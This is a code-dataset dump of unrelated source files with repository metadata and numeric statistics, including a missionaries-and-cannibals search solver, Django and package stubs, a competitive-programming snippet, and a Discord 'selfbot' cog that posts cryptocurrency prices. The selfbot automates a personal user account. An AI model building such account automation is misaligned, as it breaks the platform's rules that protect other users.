test_cv_lack_json()
test_cv_lack_mindrecord()
test_invalid_mindrecord()
test_minddataset_lack_db()
test_cv_minddataset_pk_sample_error_class_column()
test_cv_minddataset_pk_sample_exclusive_shuffle()
test_cv_minddataset_reader_different_schema()
test_cv_minddataset_reader_different_page_size()
test_minddataset_invalidate_num_shards()
test_minddataset_invalidate_shard_id()
test_minddataset_shard_id_bigger_than_num_shard()
test_cv_minddataset_partition_num_samples_equals_0()
| 37.8125
| 111
| 0.663332
| 1,598
| 11,495
| 4.449937
| 0.125782
| 0.090001
| 0.067501
| 0.054001
| 0.811138
| 0.778793
| 0.751934
| 0.728449
| 0.691323
| 0.681198
| 0
| 0.015827
| 0.214006
| 11,495
| 303
| 112
| 37.937294
| 0.771223
| 0.074206
| 0
| 0.727642
| 0
| 0
| 0.125519
| 0.004058
| 0
| 0
| 0
| 0
| 0.028455
| 1
| 0.065041
| false
| 0
| 0.01626
| 0
| 0.081301
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 6
|
910b60265fd545a298352a048db71f0afe00a521
| 21,958
|
py
|
Python
|
mission_cannibal_Mike_Boodoo.py
|
BluedragonXVI/missionary_cannibal
|
0e9edfbb60acc41f46477ca5ef7e39c41fb95b1b
|
[
"MIT"
] | null | null | null |
mission_cannibal_Mike_Boodoo.py
|
BluedragonXVI/missionary_cannibal
|
0e9edfbb60acc41f46477ca5ef7e39c41fb95b1b
|
[
"MIT"
] | null | null | null |
mission_cannibal_Mike_Boodoo.py
|
BluedragonXVI/missionary_cannibal
|
0e9edfbb60acc41f46477ca5ef7e39c41fb95b1b
|
[
"MIT"
] | null | null | null |
import heapq
# Michael Boodoo
# Artificial Intelligence Assign 01
# DFS and A* algorithms acting on Node class who's state is represented as a dictionary
# DFS's fringe/frontier is a list and A* is a min-priority queue, using the heapq module
# Since dictionaries aren't hashable, the closed/reached set contains string representation of state, str(Node.state)
# Node class has global Node class counter that is cleared after DFS or A* are run
# Main work happens in the Node.perform_action method that takes an action from the action tuple and ensures it is valid
# New node is only generated if resulting new state is valid and satifies constraints of the problem
# Output and discussion at end
class Node:
node_count = 0
def __init__(self, state:dict, parent, prev_action, depth:int, total_cost:int):
self.state = state
self.parent:Node = parent
self.prev_action:tuple = prev_action
self.depth = depth
Node.node_count += 1
def A_star_cost(self, depth): # f(n) used in A*
# need total number on left for both side heuristics
num_left = self.state[ML] + self.state[CL]
if self.state["position"] == left and num_left < 3:
return 1 + depth
elif self.state["position"] == left and num_left > 2:
return ((num_left-2)*2)+1+depth
elif self.state["position"] == right:
return (2*num_left) + depth
def print_path(self, flag:bool):
num_miss:int
num_cann:int
direction = ""
while self.parent is not None:
for miss, cann in self.prev_action.items():
num_miss, num_cann = miss, cann
if (self.state["position"] == left):
direction = right
else:
direction = left
if flag != True:
print("DFS SOLUTION NODE -", str(self.state), "at depth: ",self.depth, "by bringing", num_miss, "miss and", num_cann, " cann from the", direction)
else:
print("A* SOLUTION NODE -", str(self.state), "at depth: ",self.depth, "by bringing", num_miss, "miss and", num_cann, " cann from the", direction, "f(n) =", self.total_cost)
self = self.parent
print("INITIAL NODE -", str(self.state), "at depth: ",self.depth)
def perform_action(self, action:dict, fringe:list, reached:set):
num_miss:int
num_cann:int
for miss, cann in action.items():
num_miss, num_cann = miss, cann
# check if action is actually possible (enough miss or cann on that side)
# for initial state, {3,3,L,0,0} gave me no missed actions as expected
if self.state["position"] == left: # all actions will be applied to left -> right
if num_miss > self.state[ML]:
#print("Action not performed, not enough miss to move, num_miss: ", num_miss)
return # ensure there are enough miss and cann to transfer
if num_cann > self.state[CL]:
#print("Action not performed, not enough cann to move, num_cann: ", num_cann)
return
# now ensure that the state is legal (cann don't outnumber miss)
next_miss_left, next_miss_right = self.state[ML] - num_miss, self.state[MR] + num_miss
next_cann_left, next_cann_right = self.state[CL] - num_cann, self.state[CR] + num_cann
if next_cann_left > next_miss_left and next_miss_left > 0:
#print("Illegal move detected, cannibals:", next_cann_left, " outnumber missionaries:", next_miss_left, "on left!")
#print("The attemped move was sending", num_cann, "cannibals and", num_miss, "missionaries to the right")
return
if next_cann_right > next_miss_right and next_miss_right > 0:
#print("Illegal move detected, cannibals:", next_cann_right, " outnumber missionaries:", next_miss_right, "on right!")
#print("The attemped move was sending", num_cann, "cannibals and", num_miss, " missionaries to the right")
return
# legal nodes can now be added to frontier/fringe
# create the state of the new node
new_state:dict = {ML:next_miss_left, CL:next_cann_left, "position":right, MR:next_miss_right, CR:next_cann_right}
state_string = str(new_state)
if state_string not in reached:
new_node:Node = Node(new_state, self, action, self.depth+1, None)
new_node.total_cost = new_node.A_star_cost(self.depth)
print("New unique node created with state:", new_state, "with depth:", new_node.depth)
fringe.append(new_node)
reached.add(state_string)
#print("state string added to reached with value:", state_string)
if self.state["position"] == right: # all actions will be applied to right -> left
if num_miss > self.state[MR]:
#print("Action not performed, not enough miss to move, num_miss: ", num_miss)
return # ensure there are enough miss and cann to transfer
if num_cann > self.state[CR]:
#print("Action not performed, not enough cann to move, num_cann: ", num_cann)
return
# now ensure that the state is legal (cann don't outnumber miss)
next_miss_left, next_miss_right = self.state[ML] + num_miss, self.state[MR] - num_miss
next_cann_left, next_cann_right = self.state[CL] + num_cann, self.state[CR] - num_cann
if next_cann_left > next_miss_left and next_miss_left > 0:
#print("Illegal move detected, cannibals:", next_cann_left, " outnumber missionaries:", next_miss_left, "on left!")
#print("The attemped move was sending", num_cann, "cannibals and", num_miss, "missionaries to the right")
return
if next_cann_right > next_miss_right and next_miss_right > 0:
#print("Illegal move detected, cannibals:", next_cann_right, " outnumber missionaries:", next_miss_right, "on right!")
#print("The attemped move was sending", num_cann, "cannibals and", num_miss, " missionaries to the right")
return
# legal nodes can now be added to frontier/fringe
# create the state of the new node
new_state:dict = {ML:next_miss_left, CL:next_cann_left, "position":left, MR:next_miss_right, CR:next_cann_right}
state_string = str(new_state)
if state_string not in reached:
new_node:Node = Node(new_state, self, action, self.depth+1, None)
print("New unique node created with state:", new_state, "with depth:", new_node.depth)
fringe.append(new_node)
reached.add(state_string)
#print("state string added to reached with value:", state_string)
# A_star action
def perform_action_a_star(self, action:dict, priority_queue, reached:set):
num_miss:int
num_cann:int
for miss, cann in action.items():
num_miss, num_cann = miss, cann
# check if action is actually possible (enough miss or cann on that side)
# for initial state, {3,3,L,0,0} gave me no missed actions as expected
if self.state["position"] == left: # all actions will be applied to left -> right
if num_miss > self.state[ML]:
#print("Action not performed, not enough miss to move, num_miss: ", num_miss)
return # ensure there are enough miss and cann to transfer
if num_cann > self.state[CL]:
#print("Action not performed, not enough cann to move, num_cann: ", num_cann)
return
# now ensure that the state is legal (cann don't outnumber miss)
next_miss_left, next_miss_right = self.state[ML] - num_miss, self.state[MR] + num_miss
next_cann_left, next_cann_right = self.state[CL] - num_cann, self.state[CR] + num_cann
if next_cann_left > next_miss_left and next_miss_left > 0:
#print("Illegal move detected, cannibals:", next_cann_left, " outnumber missionaries:", next_miss_left, "on left!")
#print("The attemped move was sending", num_cann, "cannibals and", num_miss, "missionaries to the right")
return
if next_cann_right > next_miss_right and next_miss_right > 0:
#print("Illegal move detected, cannibals:", next_cann_right, " outnumber missionaries:", next_miss_right, "on right!")
#print("The attemped move was sending", num_cann, "cannibals and", num_miss, " missionaries to the right")
return
# legal nodes can now be added to frontier/fringe
# create the state of the new node
new_state:dict = {ML:next_miss_left, CL:next_cann_left, "position":right, MR:next_miss_right, CR:next_cann_right}
state_string = str(new_state)
if state_string not in reached:
new_node:Node = Node(new_state, self, action, self.depth+1, None)
new_node.total_cost = new_node.A_star_cost(new_node.depth)
print("New unique node created with state:", new_state, "with depth:", new_node.depth, "and A* cost:", new_node.total_cost)
#fringe.append(new_node)
heapq.heappush(priority_queue, (new_node.total_cost, state_string, new_node))
reached.add(state_string)
#print("state string added to reached with value:", state_string)
if self.state["position"] == right: # all actions will be applied to right -> left
if num_miss > self.state[MR]:
#print("Action not performed, not enough miss to move, num_miss: ", num_miss)
return # ensure there are enough miss and cann to transfer
if num_cann > self.state[CR]:
#print("Action not performed, not enough cann to move, num_cann: ", num_cann)
return
# now ensure that the state is legal (cann don't outnumber miss)
next_miss_left, next_miss_right = self.state[ML] + num_miss, self.state[MR] - num_miss
next_cann_left, next_cann_right = self.state[CL] + num_cann, self.state[CR] - num_cann
if next_cann_left > next_miss_left and next_miss_left > 0:
#print("Illegal move detected, cannibals:", next_cann_left, " outnumber missionaries:", next_miss_left, "on left!")
#print("The attemped move was sending", num_cann, "cannibals and", num_miss, "missionaries to the right")
return
if next_cann_right > next_miss_right and next_miss_right > 0:
#print("Illegal move detected, cannibals:", next_cann_right, " outnumber missionaries:", next_miss_right, "on right!")
#print("The attemped move was sending", num_cann, "cannibals and", num_miss, " missionaries to the right")
return
# legal nodes can now be added to frontier/fringe
# create the state of the new node
new_state:dict = {ML:next_miss_left, CL:next_cann_left, "position":left, MR:next_miss_right, CR:next_cann_right}
state_string = str(new_state)
if state_string not in reached:
new_node:Node = Node(new_state, self, action, self.depth+1, None)
new_node.total_cost = new_node.A_star_cost(new_node.depth)
print("New unique node created with state:", new_state, "with depth:", new_node.depth, "and A* cost:", new_node.total_cost)
#fringe.append(new_node)
heapq.heappush(priority_queue, (new_node.total_cost, state_string, new_node))
reached.add(state_string)
#print("state string added to reached with value:", state_string)
if __name__ == "__main__":
ML, MR = "miss_left", "miss_right"
CL, CR = "cann_left", "cann_right"
left, right = "left", "right"
frontier:list = []
actions:tuple = ({2:0}, {0:2}, {1:1}, {1:0}, {0:1}) # tuple of {miss:cann} entries. key of tuple entry is miss, value of tuple entry is cann
initial_state = {ML:3, CL:3, "position":left, MR:0, CR:0}
goal_state = {ML:0, CL:0, "position":right, MR:3, CR:3}
reached:set = set()
Node.node_count = 0
inital_node = Node(initial_state, None, None, 0, None)
for action in actions: # each item is a miss:cann dictionary
a_star_flag = False
inital_node.perform_action(action, frontier, reached)
found_solution = False
while frontier and (found_solution != True):
current_node:Node = frontier.pop()
if current_node.state == goal_state:
print("VALID STATE REACHED at depth:", current_node.depth)
found_solution = True
current_node.print_path(a_star_flag)
print("Number of nodes created:", Node.node_count)
break
else:
for action_2 in actions:
current_node.perform_action(action_2, frontier, reached)
print("End reached...")
reached.clear()
# A* version of above which is same except for min_priority_queue operations
Node.node_count = 0
reached_a_star:set = set()
priority_queue = []
for action in actions: # each item is a miss:cann dictionary
a_star_flag = True
inital_node.perform_action_a_star(action, priority_queue, reached_a_star)
found_solution = False
while priority_queue and (found_solution != True):
popped_node_tuple = heapq.heappop(priority_queue)
current_node:Node = popped_node_tuple[2]
if current_node.state == goal_state:
print("VALID STATE REACHED at depth:", current_node.depth)
found_solution = True
current_node.print_path(a_star_flag)
print("Number of nodes created:", Node.node_count)
break
else:
for action_2 in actions:
current_node.perform_action_a_star(action_2, priority_queue, reached_a_star)
print("End reached...")
reached_a_star.clear()
# Code output and analysis below:
# Without using a reached set, DFS never stopped and generated nodes at depth > 40,000 until manually stopping program
# Using a reached set, DFS found a solution at depth 11 while generating 15 legal nodes, output below:
# Solution nodes output in reverse order (Goal_state -> ... -> Initial_state) along with action previously applied to get to that state
"""
VALID STATE REACHED at depth: 11
DFS SOLUTION NODE - {'miss_left': 0, 'cann_left': 0, 'position': 'right', 'miss_right': 3, 'cann_right': 3} at depth: 11 by bringing 0 miss and 2 cann from the left
DFS SOLUTION NODE - {'miss_left': 0, 'cann_left': 2, 'position': 'left', 'miss_right': 3, 'cann_right': 1} at depth: 10 by bringing 0 miss and 1 cann from the right
DFS SOLUTION NODE - {'miss_left': 0, 'cann_left': 1, 'position': 'right', 'miss_right': 3, 'cann_right': 2} at depth: 9 by bringing 0 miss and 2 cann from the left
DFS SOLUTION NODE - {'miss_left': 0, 'cann_left': 3, 'position': 'left', 'miss_right': 3, 'cann_right': 0} at depth: 8 by bringing 0 miss and 1 cann from the right
DFS SOLUTION NODE - {'miss_left': 0, 'cann_left': 2, 'position': 'right', 'miss_right': 3, 'cann_right': 1} at depth: 7 by bringing 2 miss and 0 cann from the left
DFS SOLUTION NODE - {'miss_left': 2, 'cann_left': 2, 'position': 'left', 'miss_right': 1, 'cann_right': 1} at depth: 6 by bringing 1 miss and 1 cann from the right
DFS SOLUTION NODE - {'miss_left': 1, 'cann_left': 1, 'position': 'right', 'miss_right': 2, 'cann_right': 2} at depth: 5 by bringing 2 miss and 0 cann from the left
DFS SOLUTION NODE - {'miss_left': 3, 'cann_left': 1, 'position': 'left', 'miss_right': 0, 'cann_right': 2} at depth: 4 by bringing 0 miss and 1 cann from the right
DFS SOLUTION NODE - {'miss_left': 3, 'cann_left': 0, 'position': 'right', 'miss_right': 0, 'cann_right': 3} at depth: 3 by bringing 0 miss and 2 cann from the left
DFS SOLUTION NODE - {'miss_left': 3, 'cann_left': 2, 'position': 'left', 'miss_right': 0, 'cann_right': 1} at depth: 2 by bringing 0 miss and 1 cann from the right
DFS SOLUTION NODE - {'miss_left': 3, 'cann_left': 1, 'position': 'right', 'miss_right': 0, 'cann_right': 2} at depth: 1 by bringing 0 miss and 2 cann from the left
INITIAL NODE - {'miss_left': 3, 'cann_left': 3, 'position': 'left', 'miss_right': 0, 'cann_right': 0} at depth: 0
"""
# Without using a reached set, A* found a solution at depth 11 while generating 23 legal nodes, output below:
"""
VALID STATE REACHED at depth: 11
A* SOLUTION NODE - {'miss_left': 0, 'cann_left': 0, 'position': 'right', 'miss_right': 3, 'cann_right': 3} at depth: 11 by bringing 0 miss and 2 cann from the left f(n) = 11
A* SOLUTION NODE - {'miss_left': 0, 'cann_left': 2, 'position': 'left', 'miss_right': 3, 'cann_right': 1} at depth: 10 by bringing 0 miss and 1 cann from the right f(n) = 11
A* SOLUTION NODE - {'miss_left': 0, 'cann_left': 1, 'position': 'right', 'miss_right': 3, 'cann_right': 2} at depth: 9 by bringing 0 miss and 2 cann from the left f(n) = 11
A* SOLUTION NODE - {'miss_left': 0, 'cann_left': 3, 'position': 'left', 'miss_right': 3, 'cann_right': 0} at depth: 8 by bringing 0 miss and 1 cann from the right f(n) = 11
A* SOLUTION NODE - {'miss_left': 0, 'cann_left': 2, 'position': 'right', 'miss_right': 3, 'cann_right': 1} at depth: 7 by bringing 2 miss and 0 cann from the left f(n) = 11
A* SOLUTION NODE - {'miss_left': 2, 'cann_left': 2, 'position': 'left', 'miss_right': 1, 'cann_right': 1} at depth: 6 by bringing 1 miss and 1 cann from the right f(n) = 11
A* SOLUTION NODE - {'miss_left': 1, 'cann_left': 1, 'position': 'right', 'miss_right': 2, 'cann_right': 2} at depth: 5 by bringing 2 miss and 0 cann from the left f(n) = 9
A* SOLUTION NODE - {'miss_left': 3, 'cann_left': 1, 'position': 'left', 'miss_right': 0, 'cann_right': 2} at depth: 4 by bringing 0 miss and 1 cann from the right f(n) = 9
A* SOLUTION NODE - {'miss_left': 3, 'cann_left': 0, 'position': 'right', 'miss_right': 0, 'cann_right': 3} at depth: 3 by bringing 0 miss and 2 cann from the left f(n) = 9
A* SOLUTION NODE - {'miss_left': 3, 'cann_left': 2, 'position': 'left', 'miss_right': 0, 'cann_right': 1} at depth: 2 by bringing 0 miss and 1 cann from the right f(n) = 9
A* SOLUTION NODE - {'miss_left': 3, 'cann_left': 1, 'position': 'right', 'miss_right': 0, 'cann_right': 2} at depth: 1 by bringing 0 miss and 2 cann from the left f(n) = 9
INITIAL NODE - {'miss_left': 3, 'cann_left': 3, 'position': 'left', 'miss_right': 0, 'cann_right': 0} at depth: 0
Number of nodes created: 23
-------------------------------------------------------------------------------------------------------------------
"""
# Using a reached set to avoid cycles, A* found a solution at depth 11 while generating 14 nodes, output below:
"""
VALID STATE REACHED at depth: 11
A* SOLUTION NODE - {'miss_left': 0, 'cann_left': 0, 'position': 'right', 'miss_right': 3, 'cann_right': 3} at depth: 11 by bringing 0 miss and 2 cann from the left f(n) = 11
A* SOLUTION NODE - {'miss_left': 0, 'cann_left': 2, 'position': 'left', 'miss_right': 3, 'cann_right': 1} at depth: 10 by bringing 0 miss and 1 cann from the right f(n) = 11
A* SOLUTION NODE - {'miss_left': 0, 'cann_left': 1, 'position': 'right', 'miss_right': 3, 'cann_right': 2} at depth: 9 by bringing 0 miss and 2 cann from the left f(n) = 11
A* SOLUTION NODE - {'miss_left': 0, 'cann_left': 3, 'position': 'left', 'miss_right': 3, 'cann_right': 0} at depth: 8 by bringing 0 miss and 1 cann from the right f(n) = 11
A* SOLUTION NODE - {'miss_left': 0, 'cann_left': 2, 'position': 'right', 'miss_right': 3, 'cann_right': 1} at depth: 7 by bringing 2 miss and 0 cann from the left f(n) = 11
A* SOLUTION NODE - {'miss_left': 2, 'cann_left': 2, 'position': 'left', 'miss_right': 1, 'cann_right': 1} at depth: 6 by bringing 1 miss and 1 cann from the right f(n) = 11
A* SOLUTION NODE - {'miss_left': 1, 'cann_left': 1, 'position': 'right', 'miss_right': 2, 'cann_right': 2} at depth: 5 by bringing 2 miss and 0 cann from the left f(n) = 9
A* SOLUTION NODE - {'miss_left': 3, 'cann_left': 1, 'position': 'left', 'miss_right': 0, 'cann_right': 2} at depth: 4 by bringing 0 miss and 1 cann from the right f(n) = 9
A* SOLUTION NODE - {'miss_left': 3, 'cann_left': 0, 'position': 'right', 'miss_right': 0, 'cann_right': 3} at depth: 3 by bringing 0 miss and 2 cann from the left f(n) = 9
A* SOLUTION NODE - {'miss_left': 3, 'cann_left': 2, 'position': 'left', 'miss_right': 0, 'cann_right': 1} at depth: 2 by bringing 0 miss and 1 cann from the right f(n) = 9
A* SOLUTION NODE - {'miss_left': 3, 'cann_left': 1, 'position': 'right', 'miss_right': 0, 'cann_right': 2} at depth: 1 by bringing 0 miss and 2 cann from the left f(n) = 9
INITIAL NODE - {'miss_left': 3, 'cann_left': 3, 'position': 'left', 'miss_right': 0, 'cann_right': 0} at depth: 0
Number of nodes created: 14
"""
# DFS found solution at same depth as A*, I believe this is due to the constraints of the problem severely reducing the amount of nodes being made.
# The branching factor ends up being less than 5 many times because of the constraints
# Should test with bigger initial state with more miss and cann to see if algorithms diverge
# Unlike DFS, A* found the same solution with and without a closed/reached set where DFS only worked with a closed list since
# due to being trapped in a cycle.
# If the heuristic function is admissible and consistent this would then suggest depth 11 is the optimal solution depth.
| 66.138554
| 188
| 0.638765
| 3,331
| 21,958
| 4.047133
| 0.079856
| 0.033825
| 0.032045
| 0.048958
| 0.80721
| 0.792894
| 0.783844
| 0.779245
| 0.771382
| 0.765596
| 0
| 0.022577
| 0.247609
| 21,958
| 332
| 189
| 66.138554
| 0.793414
| 0.277348
| 0
| 0.660714
| 0
| 0
| 0.069853
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.029762
| false
| 0
| 0.005952
| 0
| 0.160714
| 0.095238
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 6
|
91263cdac61771d667f3d36e721f9b01fe1888c0
| 98
|
py
|
Python
|
api/__init__.py
|
bnbwebexpertise/linkr
|
657bdd3b5c77b67702b9398da000e19d3f5bb875
|
[
"MIT"
] | 124
|
2016-12-23T02:14:45.000Z
|
2021-11-20T15:25:20.000Z
|
api/__init__.py
|
bnbwebexpertise/linkr
|
657bdd3b5c77b67702b9398da000e19d3f5bb875
|
[
"MIT"
] | 24
|
2017-05-29T10:15:15.000Z
|
2019-05-23T13:30:58.000Z
|
api/__init__.py
|
bnbwebexpertise/linkr
|
657bdd3b5c77b67702b9398da000e19d3f5bb875
|
[
"MIT"
] | 19
|
2017-05-15T13:19:07.000Z
|
2021-05-14T02:35:05.000Z
|
# flake8: noqa: F401
from auth import *
from link import *
from misc import *
from user import *
| 14
| 20
| 0.714286
| 15
| 98
| 4.666667
| 0.6
| 0.428571
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.051948
| 0.214286
| 98
| 6
| 21
| 16.333333
| 0.857143
| 0.183673
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 6
|
912fa52714064da3a53bcfaa300598cb017f9470
| 156
|
py
|
Python
|
profiles_api/admin.py
|
law187/profile-rest-api
|
ec4e3ce44c73d2f7081435a2626543495ec69e8d
|
[
"MIT"
] | null | null | null |
profiles_api/admin.py
|
law187/profile-rest-api
|
ec4e3ce44c73d2f7081435a2626543495ec69e8d
|
[
"MIT"
] | null | null | null |
profiles_api/admin.py
|
law187/profile-rest-api
|
ec4e3ce44c73d2f7081435a2626543495ec69e8d
|
[
"MIT"
] | null | null | null |
from django.contrib import admin
from profiles_api import models
admin.site.register(models.UserProfile)
admin.site.register(models.ProfuleFeedItem)
| 22.285714
| 44
| 0.820513
| 20
| 156
| 6.35
| 0.6
| 0.141732
| 0.267717
| 0.362205
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.108974
| 156
| 6
| 45
| 26
| 0.913669
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 0.5
| 0
| 0.5
| 0
| 1
| 0
| 0
| null | 0
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 0
| 0
|
0
| 6
|
9149f6229814912ec65979ab5700e04902706492
| 42
|
py
|
Python
|
seamseg/config/__init__.py
|
gladcolor/seamseg
|
9e6c7e2828f32b311a7b0c16b279ac194e8aaf94
|
[
"BSD-3-Clause"
] | 282
|
2019-06-07T11:37:01.000Z
|
2022-03-19T05:43:02.000Z
|
seamseg/config/__init__.py
|
gladcolor/seamseg
|
9e6c7e2828f32b311a7b0c16b279ac194e8aaf94
|
[
"BSD-3-Clause"
] | 32
|
2019-07-02T10:39:03.000Z
|
2022-03-10T14:10:13.000Z
|
seamseg/config/__init__.py
|
gladcolor/seamseg
|
9e6c7e2828f32b311a7b0c16b279ac194e8aaf94
|
[
"BSD-3-Clause"
] | 56
|
2019-07-24T02:31:37.000Z
|
2022-01-07T16:19:50.000Z
|
from .config import load_config, DEFAULTS
| 21
| 41
| 0.833333
| 6
| 42
| 5.666667
| 0.833333
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.119048
| 42
| 1
| 42
| 42
| 0.918919
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 6
|
e67d12c5acfe6a9870df25c57f2a3b06c367d853
| 3,179
|
py
|
Python
|
zeenode-selfbot/zeenode/cogs/currency.py
|
PercyTheB/zeenode-fixed
|
d91750a8ef66ae92053aab16e7bc57457ddf71d4
|
[
"MIT"
] | null | null | null |
zeenode-selfbot/zeenode/cogs/currency.py
|
PercyTheB/zeenode-fixed
|
d91750a8ef66ae92053aab16e7bc57457ddf71d4
|
[
"MIT"
] | null | null | null |
zeenode-selfbot/zeenode/cogs/currency.py
|
PercyTheB/zeenode-fixed
|
d91750a8ef66ae92053aab16e7bc57457ddf71d4
|
[
"MIT"
] | null | null | null |
import discord, pyfiglet, requests, json
from discord.ext import commands as zeenode
class currency(zeenode.Cog):
def __init__(self, bot):
self.bot = bot
@zeenode.command()
async def btc(self, ctx):
await ctx.message.delete()
r = requests.get(
"https://min-api.cryptocompare.com/data/price?fsym=BTC&tsyms=USD,EUR"
)
kekistan = r.json()
eur = kekistan["EUR"]
usd = kekistan["USD"]
await ctx.send(
f"""
Bitcoin:
EUR: {str(eur)}€\nUSD: {str(usd)}$
"""
),
@zeenode.command()
async def xmr(self, ctx):
await ctx.message.delete()
r = requests.get(
"https://min-api.cryptocompare.com/data/price?fsym=XMR&tsyms=USD,EUR"
)
kekistan = r.json()
eur = kekistan["EUR"]
usd = kekistan["USD"]
await ctx.send(
f"""
Monero:
EUR: {str(eur)}€\nUSD: {str(usd)}$
"""
)
@zeenode.command()
async def xrp(self, ctx):
await ctx.message.delete()
r = requests.get(
"https://min-api.cryptocompare.com/data/price?fsym=XRP&tsyms=USD,EUR"
)
kekistan = r.json()
eur = kekistan["EUR"]
usd = kekistan["USD"]
# embedic = discord.Embed(description=f"EUR: {str(eur)}€\nUSD: {str(usd)}$")
# embedic.set_author(
# name="Ripple",
# icon_url="https://cdn.freebiesupply.com/logos/large/2x/ripple-2-logo-png-transparent.png",
# )
# await ctx.send(embed=embedic)
await ctx.send(
f"""
Ripple:
EUR: {str(eur)}€\nUSD: {str(usd)}$
"""
)
@zeenode.command()
async def doge(self, ctx):
await ctx.message.delete()
r = requests.get(
"https://min-api.cryptocompare.com/data/price?fsym=DOGE&tsyms=USD,EUR"
)
kekistan = r.json()
eur = kekistan["EUR"]
usd = kekistan["USD"]
# embedic = discord.Embed(description=f"EUR: {str(eur)}€\nUSD: {str(usd)}$")
# embedic.set_author(
# name="Dogecoin",
# icon_url="https://cdn.coindoo.com/2019/10/dogecoin-logo.png",
# )
# await ctx.send(embed=embedic)
await ctx.send(
f"""
Dogecoin:
EUR: {str(eur)}€\nUSD: {str(usd)}$
"""
)
@zeenode.command()
async def eth(self, ctx):
await ctx.message.delete()
r = requests.get(
"https://min-api.cryptocompare.com/data/price?fsym=ETH&tsyms=USD,EUR"
)
kekistan = r.json()
eur = kekistan["EUR"]
usd = kekistan["USD"]
# embedic = discord.Embed(description=f"EUR: {str(eur)}€\nUSD: {str(usd)}$")
# embedic.set_author(
# name="Ethereum",
# icon_url="https://cdn.freebiesupply.com/logos/large/2x/ethereum-1-logo-png-transparent.png",
# )
# await ctx.send(embed=embedic)
await ctx.send(
f"""
Ethereum:
EUR: {str(eur)}€\nUSD: {str(usd)}$
"""
)
def setup(bot):
bot.add_cog(currency(bot))
| 28.9
| 107
| 0.519031
| 373
| 3,179
| 4.41555
| 0.201072
| 0.063145
| 0.058288
| 0.048573
| 0.806922
| 0.806922
| 0.806922
| 0.794778
| 0.794778
| 0.742562
| 0
| 0.0046
| 0.316137
| 3,179
| 109
| 108
| 29.165138
| 0.74931
| 0.21988
| 0
| 0.609756
| 0
| 0.060976
| 0.251276
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.02439
| false
| 0
| 0.02439
| 0
| 0.060976
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 6
|
e6a02a9ce74eaea3e1660226c358b4f06e4a208d
| 82
|
py
|
Python
|
abc/abc082/abc082a.py
|
c-yan/atcoder
|
940e49d576e6a2d734288fadaf368e486480a948
|
[
"MIT"
] | 1
|
2019-08-21T00:49:34.000Z
|
2019-08-21T00:49:34.000Z
|
abc/abc082/abc082a.py
|
c-yan/atcoder
|
940e49d576e6a2d734288fadaf368e486480a948
|
[
"MIT"
] | null | null | null |
abc/abc082/abc082a.py
|
c-yan/atcoder
|
940e49d576e6a2d734288fadaf368e486480a948
|
[
"MIT"
] | null | null | null |
from math import ceil
a, b = map(int, input().split())
print(ceil((a + b) / 2))
| 13.666667
| 32
| 0.585366
| 15
| 82
| 3.2
| 0.8
| 0.208333
| 0.25
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.015152
| 0.195122
| 82
| 5
| 33
| 16.4
| 0.712121
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 0.333333
| 0
| 0.333333
| 0.333333
| 1
| 0
| 0
| null | 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 0
| 0
|
0
| 6
|
fc1dd25eb3ea83bd5c54aef0cbd8f86b73abd1e8
| 76,639
|
py
|
Python
|
src/transformers/data/data_collator.py
|
manuelciosici/transformers
|
c33f6046c3dab8f41bedf893404e6469dea3bce8
|
[
"Apache-2.0"
] | 8,028
|
2018-11-05T15:19:44.000Z
|
2019-07-16T09:14:59.000Z
|
src/transformers/data/data_collator.py
|
ymwangg/transformers
|
4a419d4995111c22d6842ee1bcd2d3f500150845
|
[
"Apache-2.0"
] | 731
|
